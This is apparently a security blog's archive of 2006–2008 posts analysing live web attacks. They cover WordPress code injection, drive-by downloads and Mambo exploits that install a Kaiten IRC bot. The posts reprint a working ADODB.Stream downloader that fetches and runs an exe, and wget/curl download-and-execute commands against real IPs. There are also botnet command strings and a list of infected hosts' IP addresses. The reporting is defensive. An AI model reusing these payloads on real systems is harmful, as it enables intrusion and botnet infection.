WordPress 2.5.0 and 2.5.1 vulnerable to attack

Sunday, June 8, 2008

Thanks to co-author Brandon Palmen for the heads up to a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations using a recently announced vulnerability. More details in a well written write up here.

The code snippets from a digitalpoint.com forum are shown using base64 encoding to hide the true destination:


<php>
$seref=array("google","msn",
"live","altavista","ask",
"yahoo","aol","cnn",
"weather","alexa");

$ser=0;
foreach($seref as $ref)

if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0)
{
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;
}
></php>

This code shows yet another trend we’ve noticed at stopbadware.org of only exploiting those requests which come directly from a search engine. We can only conclude this is to prevent (or delay) detection and maximize infection duration.

Filed in Digital Warfare, Vulnerabilities | Comments (0) | Permalink

Top 2007 Symantec Vulnerabilities

Wednesday, January 2, 2008


MAY 25, 2006 | EEye Digital Security revealed this afternoon a software vulnerability inside Symantec’s Anti-Virus Corporate Edition 10.0.

The vulnerability warning, posted on the vendor’s Upcoming Advisories page, requires no user intervention and could be used to create a worm. A Symantec representative told Dark Reading that eEye notified Symantec of the problem today and it is investigating the issue.

Filed in Digital Warfare, Vulnerabilities | Comments (0) | Permalink

Great Reading List on Web Exploits

Wednesday, May 9, 2007

I was reading up on inet-lux and found a great blog post in spanish which provides a must read references list. I ended up here reading about a java based botnet tool I found while researching appeals today. I hope to have more on that later but have not had time to decompile it. Anyone want to donate an IDA Pro license?

[1]:
Microsoft Security Bulletin MS06-014
Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx

Microsoft Security Bulletin MS03-011
Flaw in Microsoft VM Could Enable Compromise System (816093)
http://www.microsoft.com/technet/security/bulletin/ms03-011.mspx

Microsoft Internet Explorer Javascript Window () Vulnerability:
Microsoft Security Bulletin MS05-054
Cumulative Security for Update Internet Explorer (905915)
http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx

Microsoft Security Bulletin MS06-006
Vulnerability in Windows Average Player Plug-in with Non-Microsoft Internet
Browsers Could Allow Remote Code Execution (911564)
http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx

Mozilla Foundation Security Advisory 2005-50
Exploitable crash in InstallVersion.com pareTo (Firefox, Mozilla Suite)
http://www.mozilla.org/security/announce/2005/mfsa2005-50.html

Microsoft Security Advisory (917077)
Vulnerability in the way HTML Objects Handle Unexpected Method Calls Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/917077.mspx

Microsoft Security Bulletin MS06-006
Vulnerability in Windows Average Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)
http://www.microsoft.com/technet/security/Bulletin/MS06-006.mspx

IE ms-its: and mk: @MSITStore: vulnerability:
Microsoft Security Bulletin MS04-013
Cumulative Security for Update Outlook Express (837009)
http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx

– [2]:
http://www.enciclopediavirus.com/virus/vervirus.php?id=3456

Source: http://www.rzw.com.ar
___

Filed in spyware, Vulnerabilities | Comments (0) | Permalink

Internet.HHCtrl.1 Exploit

Sunday, December 24, 2006

I’ve enclosed the code in a text box to make reading it a little easier. This code was found on a live site that is using the exploit via iframes to infect drive by downloaders. Extra br tags are a result of the blog software….

Filed in Digital Warfare, Vulnerabilities | Comments (0) | Permalink

another variation of drive by downloaders

Sunday, December 24, 2006

The exploit used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control.

[zero@day testing]$ curl http://EVIL_SITE/db/wm.htm
<script>
var url,path;
url="http://EVIL_SITE/mc/game/db.exe";
path="C:\\boot.exe";
try{
var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ab="Adodb.";
var cd="Stream";
var g=1;
var as=ado.createobject(ab+cd,"");
var h=1;
xml.Open("GET",url,0);
xml.Send();
as.type=1;
var n=1;
as.open();
as.write(xml.responseBody);
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(path,"","","open",0);
}
catch(e){}
;</script>

Filed in Digital Warfare, Vulnerabilities | Comments (0) | Permalink

Hi, I’m a Mac

Friday, September 1, 2006

And I can get 0wned just like you PC.

* ImageIO

CVE-ID: CVE-2006-3459, CVE-2006-3461, CVE-2006-3462, CVE-2006-3465

Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079

Impact: Viewing a maliciously-crafted TIFF image may lead to an application crash or arbitrary code execution

Description: Buffer overflows were discovered in TIFF tag handling (CVE-2006-3459, CVE-2006-3465), the TIFF PixarLog decoder (CVE-2006-3461), and the TIFF NeXT RLE decoder (CVE-2006-3462). By carefully crafting a corrupt TIFF image, an attacker can trigger a buffer overflow which may lead to an application crash or arbitrary code execution. This update addresses the issue by performing additional validation of TIFF images. Systems prior to Mac OS X v10.4 are affected only by the TIFF NeXT RLE decoder issue (CVE-2006-3462). Credit to Tavis Ormandy, Google Security Team for reporting this issue.

Note:A fifth issue discovered by Tavis Ormandy, CVE-2006-3460, does not affect Mac OS X.

* OpenSSH

CVE-ID: CVE-2006-0393

Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079

Impact: When remote login is enabled, remote attackers may cause a denial of service or determine whether an account exists

Description: Attempting to log in to an OpenSSH server (“Remote Login”) using a nonexistent account causes the authentication process to hang. An attacker can exploit this behavior to detect the existence of a particular account. A large number of such attempts may lead to a denial of service. This update addresses the issue by properly handling attempted logins by nonexistent users. This issue does not affect systems prior to Mac OS X v10.4. Credit to Rob Middleton of the Centenary Institute (Sydney, Australia) for reporting this issue.

Filed in Vulnerabilities, zeroday | Comments (0) | Permalink

More attacks on my web server [Elf Kaiten.AQ]

Monday, June 5, 2006

the same as the last one which was based on Mambo (open source CMS). This time I was able to pull the files down in time.
EDIT: More information here
documented by enkrypted
UPDATE: Secunia reports this as Elf Kaiten.AQ
TrendMicro reports the trojan but the statistics are horribly wrong. Just the channel I’m monitoring alone has seen hundreads of infections via Mambo

wget 72.18.195.161/lnikon

This leads to a small script which executes the following:
cd /tmp
mkdir .font-jix
cd .font-jix
wget 72.18.195.161/linux-kernel
chmod +x linux-kernel
./linux-kernel
cd /tmp
cd .font-jix
wget 72.18.195.161/linux-mkdir
chmod +x linux-mkdir
./linux-mkdir

I won’t paste the strings results from the files here but sufficed to say it’s headed towards an irc server. I did find these servers listed:
67.43.234.119
 irc.newchrousty.org
 Sympatico.Qc.Ca.NewChrousty.org
 Trois-Rivieres.Qc.Ca.NewChrousty.org
 Chat.NewChrousty.Org
 Micro-ISP.NewChrousty.Org
 LaLiPuS.NewChrousty.Org

Some other interesting strings:
NOTICE %s :PAN
NOTICE %s :Panning %s.
NOTICE %s :TSUNAMI
NOTICE %s :Tsunami heading for %s.
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :TSUNAMI = Special packeter that wont be blocked by most firewalls
NOTICE %s :PAN = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP = A udp flooder
NOTICE %s :UNKNOWN = Another non-spoof udp flooder
NOTICE %s :NICK = Changes the nick of the client
NOTICE %s :SERVER = Changes servers
NOTICE %s :GETSPOOFS = Gets the current spoofing
NOTICE %s :SPOOFS = Changes spoofing to a subnet
NOTICE %s :DISABLE = Disables all packeting from this client
NOTICE %s :ENABLE = Enables all packeting from this client
NOTICE %s :KILL = Kills the client
NOTICE %s :GET = Downloads a file off the web and saves it onto the hd
NOTICE %s :VERSION = Requests version of client
NOTICE %s :KILLALL = Kills all current packeting
NOTICE %s :HELP = Displays this
NOTICE %s :IRC = Sends this command to the server
NOTICE %s :SH = Executes a command

UPDATE: Everything goes to a channel called #mambolizo with password ‘leet’
Here is a sample of infected IP’s

#mambolizo AUSTI H ~KVDJQ@81.192.114.78 (ZVYRRUU)
#mambolizo AXEUGVS H ~RUSC@80.71.219.42 (NUVQT)
#mambolizo AZBCPAT H ~QTBQJGAH@217.126.24.185 (LVNVG)
#mambolizo Aarh H ~discern@63.89.31.130 (silenc)
#mambolizo Aarhu H ~sett@63.89.31.130 (chef)
#mambolizo Aarhus H ~psych@63.89.31.130 (Aarhus)
#mambolizo BDMIO H ~EHKFTIRL@81.15.157.171 (DJVB)
#mambolizo BEUKTL H ~WCBJMEWJ@81.223.209.211 (EHTSVU)
#mambolizo BFFENJ H ~HZTMPV@217.157.235.41 (KWTE)
#mambolizo BFJEK H ~TFPS@213.55.30.241 (AZOSUKK)
#mambolizo BGYUO H ~QLOJD@193.157.66.96 (HJCRMV)
#mambolizo BLFDWBC H ~IGNYV@69.60.124.43 (UIQP)
#mambolizo BLMWK H ~PFWTCHIQ@202.155.6.237 (LAZYZN)
#mambolizo BMJQF H  network at 68.51.46.205 (UNSRD)
#mambolizo BPIJ H ~AWWLXM@202.83.174.36 (PMTFK)
#mambolizo BPPTPSN H ~ALCTDEWH@85.17.6.163 (YXQDAYQ)
#mambolizo BUXL H ~FBGNOOO@68.189.182.37 (VCGZ)
#mambolizo BXXMOK H ~ZBDKNNE@202.129.46.90 (GSWTDH)
#mambolizo CAHI H ~MTCSU@129.105.249.208 (JMLZ)
#mambolizo CAIZFQV H ~QPRM@82.165.177.236 (FODPLD)
#mambolizo CBZYU H ~AFBZKZ@85.20.35.66 (PFBBQXJR)
#mambolizo CCMLG H ~QSZKPUD@194.106.17.163 (DGLJLZD)
#mambolizo CCQPE H ~RELLEXA@61.220.191.21 (NTLI)
#mambolizo CCQRYBDM H ~FGHQRKAZ@24.63.215.68 (KFYBYOPR)
#mambolizo CDDDJBKB H ~DHXFP@201.217.215.66 (SWCVII)
#mambolizo CFGXYWV H ~THCRIR@85.124.118.43 (GFDWO)
#mambolizo CHABLA H ~XFGRR@193.157.66.96 (JDXK)
#mambolizo CHDQT H ~YUVWLSI@62.90.45.58 (BVLS)
#mambolizo CIUKSB H ~IGYF@207.170.12.72 (WUJHUJSG)
#mambolizo CLOAVSF H ~KPILEJS@213.55.30.241 (FPTVTLKI)
#mambolizo CLSA H ~ARZIVGWJ@24.63.215.68 (XXPG)
#mambolizo CTEM H ~VCDHTEE@130.234.7.72 (HKHTFIA)
#mambolizo CUKXSY H ~SDZLBNG@193.95.249.225 (JLGZS)
#mambolizo CUPKX H ~SIIEQCX@201.224.164.91 (LLVKOKO)
#mambolizo CWYKTNJ H ~QVPP@61.178.85.114 (BXUPLXM)
#mambolizo CXOWBXKI H ~ZJPVHC@213.55.30.241 (QZJP)
#mambolizo CZZPVI H ~JMCL@68.143.64.178 (HFQWJH)
#mambolizo DANMLPKU H ~JMGVKQ@61.220.191.9 (WGCJWERN)
#mambolizo DATECLLS H  www-data at 217.126.49.173 (XQHI)
#mambolizo DBBHZ H ~NTUT@203.55.23.51 (FTOMOL)
#mambolizo DIJZMBU H ~RECI@196.209.16.57 (KJTY)
#mambolizo DIKOUW H ~WVRFYL@24.28.88.134 (VKVLXCSJ)
#mambolizo DLIWY H  www-data at 62.94.123.42 (QPZN)
#mambolizo DOWC H ~ZVJL@213.55.30.241 (OPKSJ)
#mambolizo DRKGEP H ~QRYV@69.40.247.160 (RAEGOPKP)
#mambolizo DYFTYUG H ~GGDRNI@213.225.48.85 (GBVJOKOF)
#mambolizo DYZDB H ~CNLNG@193.157.66.96 (GDVKBW)
#mambolizo DZFZOVII H ~VSHPVG@84.170.216.17 (JHXUMND)
#mambolizo DZRU H ~JXCHPQX@202.143.173.83 (JRIRFKAJ)
#mambolizo EAISZOUV H  hidden-use at 163.21.50.253 (ZWQPAHN)
#mambolizo EARBYA H ~DEIF@130.13.141.109 (EIRJLAMR)
#mambolizo EARBYG H ~TPRULQW@213.243.33.117 (XJDI)
#mambolizo EGTE H ~RWBHQPDH@218.226.219.50 (LNIK)
#mambolizo ELTKP H ~ZEDEQK@83.30.227.15 (NNUKQM)
#mambolizo EMJD H ~BPLL@83.133.81.92 (FIARDNC)
#mambolizo EQBPZKH H ~JELWXQG@67.161.213.233 (HYDRCKDU)
#mambolizo EQPL H ~JJXJ@202.143.101.131 (DNHJQW)
#mambolizo FCWJE H ~JQLN@203.172.129.2 (VNSFD)
#mambolizo FGPBYTK H ~YJOKZQ@203.55.23.201 (PIKEA)
#mambolizo FGPBYTK H ~YJOKZQ@203.55.23.51 (PIKEA)
#mambolizo FKTN H ~FENLCJWQ@194.106.17.163 (FQWXA)
#mambolizo FPQXF H ~KOGHXI@81.223.209.211 (HMDH)
#mambolizo FUDJ H ~LDKVXAK@208.200.133.2 (GCDVMC)
#mambolizo GDBUUEX H ~VKOK@217.149.127.14 (FHFKBT)
#mambolizo GDBYKPKT H ~FCVFJCOB@69.60.124.43 (LGITHJ)
#mambolizo GDZJWT H ~OVFVDTWX@84.57.40.96 (YFXKHJ)
#mambolizo GEQNJVP H ~LILIWKOF@213.243.33.117 (EGMHFA)
#mambolizo GGCBZ H ~AOLZC@140.113.214.180 (CWAB)
#mambolizo GJATO H ~QSEK@82.151.192.61 (AGQPV)
#mambolizo GKHJX H ~WFXYXSI@201.135.134.24 (CTYSG)
#mambolizo GLUGHMP H ~LTDVBWSE@130.94.124.180 (FBWJ)
#mambolizo GOTTSJXC H ~MICTUNNR@61.183.207.183 (NFPBHG)
#mambolizo GUAOBGG H ~MKVQSWY@147.123.155.1 (CMSRZ)
#mambolizo GUYW H ~PAGXEM@67.53.244.228 (XTIN)
#mambolizo GXVAAI H ~VMPX@81.185.145.216 (AVTYXUBA)
#mambolizo GZHEFEG H ~LMVQXFJF@61.183.207.183 (NUNDDSEG)
#mambolizo HAZBZF H ~TSPKOA@202.51.31.246 (IQIKO)
#mambolizo HFPSGS H ~BZMUKKGZ@66.77.26.70 (GLKAKIC)
#mambolizo HYHHWVZ H ~PJBGTB@151.42.226.237 (YASI)
#mambolizo IAMARBMY H ~XTEKZPG@210.173.173.29 (XJNJIYOD)
#mambolizo ICIPEYX H ~PVEBNWFZ@217.126.233.168 (ABUTYCLZ)
#mambolizo ICJQTBW H ~LAKULZNH@206.248.136.95 (AXTOOZY)
#mambolizo IJBTV H ~COZRLFS@83.18.171.82 (ISALRYV)
#mambolizo IKJAJ H ~DPGY@201.102.71.14 (CAJMCB)
#mambolizo IOUEJS H ~PKVY@201.135.134.24 (FEGH)
#mambolizo IVOCSE H ~QPLT@82.149.166.130 (JZWLWXG)
#mambolizo IWJCB H ~TFDKHNL@81.235.163.148 (TWNSMVC)
#mambolizo JFKDMPW H ~PRWEH@149.156.5.206 (TLUWXDR)
#mambolizo JGQCU H ~YYMEHSAP@217.194.97.70 (SZEJFKNQ)
#mambolizo JSUVEF H ~XWCUGCY@83.18.171.82 (TYOVFQH)
#mambolizo JTGX H ~WRTL@65.75.138.190 (RNFX)
#mambolizo KAJXDC H ~XUPPT@213.169.62.179 (TWSP)
#mambolizo KARLYLG H ~OXHGW@69.60.124.43 (AHQJPJB)
#mambolizo KEMP H ~FDCL@80.32.194.218 (RYXZDOFZ)
#mambolizo KENLHRT H ~SKGU@219.117.251.138 (MFXC)
#mambolizo KJUFOM H ~ZCNFYM@82.226.252.2 (FQCMBT)
#mambolizo KNMH H ~UCSYGE@203.125.140.52 (NXOSOEM)
#mambolizo KOZPTXL H ~LQROMHV@209.200.14.230 (PZNP)
#mambolizo KUBVHXA H ~RVOKD@202.155.108.36 (OOCQBL)
#mambolizo KVNE H ~FYZCCF@69.159.203.110 (XTCRZ)
#mambolizo LCVNCLWI H ~CYCBXJM@203.219.147.14 (PSCRO)
#mambolizo LJBNJPR H ~YYFQIM@194.106.17.163 (ORKU)
#mambolizo LKQOBCR H ~UFCAXS@83.109.10.152 (FDQXQ)
#mambolizo LMXMHIL H ~PAMUKHBU@84.157.157.8 (DRTX)
#mambolizo LUMI H ~DUSGPLUQ@61.178.85.114 (XLCDPC)
#mambolizo LWNPI H ~XKDFDUFZ@83.133.81.92 (VBUPE)
#mambolizo MDSZWP H ~KOFUXKDT@64.146.134.133 (AMLM)
#mambolizo MNJVN H ~KPPEKY@65.204.137.200 (FRTRJRX)
#mambolizo MNLTYGNB H ~DZOEL@85.53.64.206 (IMQTC)
#mambolizo MQOFNW H ~GZGC@66.77.26.70 (RVBZQMCR)
#mambolizo MSQQKO H ~GZVTAMV@209.200.14.230 (XZXWNV)
#mambolizo MUVF H ~RAPR@202.172.54.61 (KCMSZSAP)
#mambolizo NDVC H ~IDIY@207.225.61.10 (AERF)
#mambolizo NFRC H ~JZBF@80.34.96.60 (BVFMEPT)
#mambolizo NHGZ H ~HSOOIPV@195.117.103.58 (HARGJ)
#mambolizo NNCXJJUD H ~ULST@81.241.202.21 (FLDSMSFH)
#mambolizo NOBMQ H ~GMHFK@69.64.49.62 (PWPRV)
#mambolizo NQQG H ~NOUP@66.77.26.70 (LMYTO)
#mambolizo NQUUBED H ~SSTLZW@81.223.209.211 (RGAOYT)
#mambolizo NSFCMC H ~EMVAI@203.55.23.201 (VHGIDT)
#mambolizo NSFCMC H ~EMVAI@203.55.23.51 (VHGIDT)
#mambolizo OHIJSLD H ~RKFDPEQ@217.194.97.70 (XDZP)
#mambolizo OKMBMPZH H ~CGYYJU@213.55.30.241 (EJPRHUP)
#mambolizo OOZGM H ~RMWD@84.87.219.36 (UMRTUVJ)
#mambolizo OQBIPNE H ~FRBI@12.36.175.159 (HLNUXRE)
#mambolizo OSUFFLN H ~CDWR@81.57.87.84 (SSFILJM)
#mambolizo OWWX H ~PYSCZ@66.160.135.87 (SEEG)
#mambolizo OXBQOHG H ~ESDIGP@195.117.179.10 (IRMB)
#mambolizo OYXU H ~RLCKXFI@193.170.41.50 (VYBMH)
#mambolizo OZAW H ~EEARLYDZ@194.144.126.233 (GFQVEZ)
#mambolizo PESOQIV H ~QBETMCB@82.236.226.54 (VFPMBQRE)
#mambolizo PFJOZ H ~ZLPNODPB@141.21.7.60 (VDIW)
#mambolizo PFVHK H ~PFGR@217.206.217.199 (XXIO)
#mambolizo PHQWJN H ~SSNITPJ@203.55.23.201 (KOZVB)
#mambolizo PVZB H ~EHDJJNT@82.226.118.139 (KRMNB)
#mambolizo PZAHGJI H ~MDVPQJV@202.143.173.83 (BYTLFC)
#mambolizo QBUITDX H ~DZOEL@85.53.64.206 (IMQTC)
#mambolizo QDCNYMS H ~HFXJM@64.242.180.2 (JSNAOR)
#mambolizo QNHPC H  www-data at 149.156.124.6 (GWTJQULB)
#mambolizo QUENMWN H ~BFKTK@24.31.6.188 (MQQV)
#mambolizo QYUEMXD H ~TAIK@213.54.172.75 (YSZEWBU)
#mambolizo QYUEMXD H ~TAIK@85.212.30.189 (YSZEWBU)
#mambolizo RAOBFQ H ~SBYWMC@61.7.147.47 (YPVFVERO)
#mambolizo RBOVLKIT H ~ZKGEC@81.209.59.194 (HKEXGZ)
#mambolizo RBXWI H ~OPVPGPU@217.170.13.48 (VPWRI)
#mambolizo RCPQMAKE H ~EEGGOQ@213.228.166.47 (BAFQV)
#mambolizo RDHFDU H ~ITBNE@82.155.145.235 (XYKWRWKZ)
#mambolizo RGDFZTMA H ~ZVZKTVVL@64.76.81.153 (FCQZ)
#mambolizo RJOWRVQB H ~NBJH@193.68.47.28 (ONOFS)
#mambolizo RMOSO H ~QOVPYK@201.17.175.51 (MHRRMUB)
#mambolizo ROWA H ~WJNHEAIZ@130.94.124.180 (CSETK)
#mambolizo RQYEFCO H ~PRGHXC@80.32.194.218 (XFBCC)
#mambolizo RSYGMGNZ H ~PUAQLO@193.40.142.254 (GUAD)
#mambolizo RUJG H ~ACVZ@68.189.182.37 (FLTABBA)
#mambolizo RXBV H ~MZUW@217.227.216.244 (AFVWDV)
#mambolizo RXBV H ~MZUW@217.227.226.182 (AFVWDV)
#mambolizo RZYDFBT H ~SGEOXUL@217.170.13.48 (NOPBQH)
#mambolizo SAURG H ~FDKKWST@193.170.41.50 (VHKN)
#mambolizo SBUXGR H ~AOLZC@140.113.214.180 (CWAB)
#mambolizo SCLT H ~TIQCMYV@217.206.217.199 (KHXRV)
#mambolizo SDXL H ~YMJVN@194.210.98.160 (XMCLL)
#mambolizo SEVRKJE H ~DNPT@83.28.39.209 (CUUPNS)
#mambolizo SEXWCEP H ~CRZBRIS@194.242.112.72 (EFUV)
#mambolizo SGLVRMEC H  hidden-use at 163.21.50.253 (RJLCLPZH)
#mambolizo SHDEMF H ~ODWMB@217.194.97.70 (YBMJJ)
#mambolizo SKAZE H ~EPCVZOKX@218.208.118.66 (SALC)
#mambolizo SKFIJTQ H ~VQFM@217.194.97.70 (QTXSSIWL)
#mambolizo SLBV H ~UDCWYGU@141.21.7.60 (NWESN)
#mambolizo SNJJRJNW H ~AYMTX@84.157.129.23 (GEDSORSY)
#mambolizo SNJJRJNW H ~AYMTX@84.157.197.113 (GEDSORSY)
#mambolizo SNUK H ~KTACK@209.200.14.230 (RYCBPV)
#mambolizo SPDR H ~GJOTW@209.172.33.199 (BZSAJMBC)
#mambolizo SSCDAPCS H ~FBBCYTAU@61.178.85.114 (VHALHLC)
#mambolizo SSQGHMH H ~VJVO@87.78.22.107 (MIPBN)
#mambolizo SSSZEAD H ~VAHAR@213.225.48.85 (YEAQJL)
#mambolizo TCJJXJ H ~TFPS@62.217.143.90 (AZOSUKK)
#mambolizo TCJS H ~PIHOXNG@196.28.49.199 (JXUMUDP)
#mambolizo TDMVTPAQ H ~MXRRVGGE@82.165.37.165 (BARPIQB)
#mambolizo TDUQZKXN H ~XAPAFYDJ@209.216.245.146 (PVOOD)
#mambolizo TEYTUIAP H ~YVFF@81.190.195.44 (EVLVIVRP)
#mambolizo TFNX H ~RSQPBS@82.151.192.61 (RSKLC)
#mambolizo THAQRBF H ~PQXZMFG@84.157.157.8 (OSXP)
#mambolizo TKFWFFW H ~GOPC@147.123.155.1 (MVQNLUW)
#mambolizo TKRKMOWV H ~AMFVAX@213.55.30.241 (CRJO)
#mambolizo TMEAMDQ H ~NTBMC@201.252.133.28 (EOVXNYS)
#mambolizo TMKUCU H ~MDAPF@202.143.162.98 (DUQANROU)
#mambolizo TOFQVCBJ H ~ZSKUYBYN@84.149.127.173 (YMUPV)
#mambolizo TOFQVCBJ H ~ZSKUYBYN@84.149.95.234 (YMUPV)
#mambolizo TPMIJD H ~YGUFM@130.94.124.180 (IBVJLDOI)
#mambolizo TRBTSS H ~AHMT@84.19.188.50 (FHTYM)
#mambolizo TROPYYWG H ~NZWO@203.55.23.201 (ABATV)
#mambolizo TUCJQB H ~PQZWTXZ@83.18.171.82 (EGVFI)
#mambolizo TXJRS H ~AGFHDY@67.161.213.233 (KYDT)
#mambolizo UBAG H ~MIKSLQWA@69.56.145.164 (IYUL)
#mambolizo UDEBAS H ~BFWLLE@217.157.235.41 (EOJDZU)
#mambolizo UGMNX H ~PVJKLW@203.55.23.201 (ANWOSOAK)
#mambolizo UGMNX H ~PVJKLW@203.55.23.51 (ANWOSOAK)
#mambolizo ULOV H ~PJOHXM@64.8.101.98 (IHFAMPE)
#mambolizo UMBAVBD H ~PULOQIE@201.135.134.24 (VYDWNXFO)
#mambolizo UPJREYD H ~WQUG@203.214.54.20 (ELEWRN)
#mambolizo UVPTWOUH H ~DZWC@147.102.101.91 (ESVQ)
#mambolizo VAZY H ~QPXYKO@203.55.23.51 (GMAIMGYH)
#mambolizo VDWD H ~CXRCMW@68.18.93.131 (MSOZRSR)
#mambolizo VEMQW H ~OGAZRKS@130.94.124.180 (FMALIBDI)
#mambolizo VFKRTQK H ~CPUYPZV@69.40.247.160 (BWFQ)
#mambolizo VKYPGN H ~RVTRABT@193.157.66.96 (JFVEWAPY)
#mambolizo VNPE H ~TFTH@213.55.30.241 (CFXTI)
#mambolizo VVPGC H ~VPGL@82.151.199.57 (SEDXUJTO)
#mambolizo VYPUVJJ H  apache at 148.244.169.141 (BCTF)
#mambolizo VZBQBK H ~DMZJJKEN@69.196.142.78 (DYPMFCGI)
#mambolizo WEANO H ~PCXCXWEG@83.18.171.82 (CWNVDO)
#mambolizo WKFJYXMW H ~WWBB@212.98.165.220 (HQSKN)
#mambolizo WQYEGXY H ~TIUSRLG@83.133.81.92 (KXCFM)
#mambolizo WSIJLO H ~BIXU@130.94.124.180 (YCUQQHZ)
#mambolizo WTPDHZ H ~PUSWTV@69.60.124.43 (TJVPZCLQ)
#mambolizo WVEAKNI H ~PRHBM@204.1.16.2 (ZIJALNH)
#mambolizo WVHQX H ~PZGUAAQD@82.236.226.54 (JFOOWP)
#mambolizo WZHSWZE H ~VWSBA@24.31.6.188 (DWXDOXF)
#mambolizo XACGE H ~PVKI@213.60.56.216 (JTDEML)
#mambolizo XBCYE H ~JSBRQ@193.157.66.96 (CQXQY)
#mambolizo XBGMKWFT H ~XVEJLF@202.172.239.112 (HJUJPF)
#mambolizo XCKHTC H ~VJTSL@219.94.130.26 (DTVGLPGL)
#mambolizo XICWY H ~HBZVYDZY@24.63.215.68 (TKQIVHC)
#mambolizo XNAOKHY H ~UVLH@85.53.64.206 (VPHOIOM)
#mambolizo XPMIJ H ~RCXMIP@67.53.244.228 (KJLM)
#mambolizo XQIQR H ~JZWRVZW@206.33.2.132 (OHAY)
#mambolizo XTDWV H ~SFHVQA@203.55.23.201 (KYQPKBJ)
#mambolizo XTDWV H ~SFHVQA@203.55.23.51 (KYQPKBJ)
#mambolizo XVADU H ~SPJR@217.206.217.199 (SMMXING)
#mambolizo XXVOR H ~MEUVLICC@194.106.17.163 (KGOZT)
#mambolizo YBHDN H ~ANSRK@69.60.124.43 (PCMT)
#mambolizo YCWVOQS H ~VAHAR@213.225.48.85 (YEAQJL)
#mambolizo YDRBQVP H ~KHHGR@202.71.143.2 (EKJRWSD)
#mambolizo YEYMEGHV H ~LCQYVW@84.149.127.173 (JJDB)
#mambolizo YEYMEGHV H ~LCQYVW@84.149.95.234 (JJDB)
#mambolizo YFADXOXO H ~RIRY@82.226.118.139 (FOBA)
#mambolizo YGTGW H ~GJAX@80.32.194.218 (LKIWEUOI)
#mambolizo YKBEJBR H ~NWCK@203.219.147.14 (WDQHWIYX)
#mambolizo YLBIVW H ~DHMM@84.255.202.157 (MIBEYIW)
#mambolizo YQTTOQGI H ~RGQNUXW@85.234.143.14 (AJFO)
#mambolizo YRODPMA H ~NSPLIXE@82.226.252.2 (UQVTRTFM)
#mambolizo YYNN H ~WJTKTGY@67.161.213.233 (JRXX)
#mambolizo ZJZYZNIZ H ~VMFIZB@66.77.26.70 (BJOETM)
#mambolizo ZMYJZRMN H ~SSTLZW@81.223.209.211 (RGAOYT)
#mambolizo ZNEV H ~LABU@202.143.162.98 (UEFA)
#mambolizo ZOIA H ~VMMHAW@151.1.140.34 (XGTEB)
#mambolizo ZXNLPD H ~SLIBKNS@82.146.17.37 (ROHJSIC)
#mambolizo ZZCHGQ H ~OUPNMIZQ@83.138.146.85 (DCEHMJE)

If you are on this list format, reinstall now.

Filed in Digital Warfare, Vulnerabilities, zeroday | Comments (0) | Permalink

Interesting attacks on my web server

Friday, May 5, 2006

Still think that firewall is enough to protect your web server? Port 80 to the rescue!
Through a combination of curl, wget and various shell commands this “URL” is a sneaky little rootkit. I haven’t had time to download the executables and rip them apart but something tells me that after all is said and done… you end up on some IRC server in Brazil. Call it a hunch.

130.227.55.243 – – [25/Apr/2006:10:08:10 -0700] “GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1” 404 1044 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)”130.227.55.243 – – [25/Apr/2006:10:08:11 -0700] “GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1” 404 1044 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)”130.227.55.243 – – [25/Apr/2006:10:08:12 -0700] “GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1” 404 1044 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)”

 Seclists.org also noticed this traffic back in March.
All of them, as we can see, are exploitation attempts to known bugged
pages (like the newest Mambo bug, the old XMLRPC problem with old
versions of Drupal, etc). I guess that they are getting a list of
domain names and trying them out with those vulns, and I believe that
they may already have some thousands of vuln machines in their hands.
Such attacks might been enhanced by using Google to guess which
domains are using which CMS… for example, looking on Google for “A
password and instructions will be sent to this e-mail address, so make
sure it is accurate.” will return a bunch of Drupal websites (88,500
according to Google, even though we can see just the first 1000 ones).

This is just an advise for all admins that use those CMS, to keep, as
always, your CMS updated (almost every two weeks there are new vulns
disclosed), and also, check if you already got caught by that, if
you’re running old software.

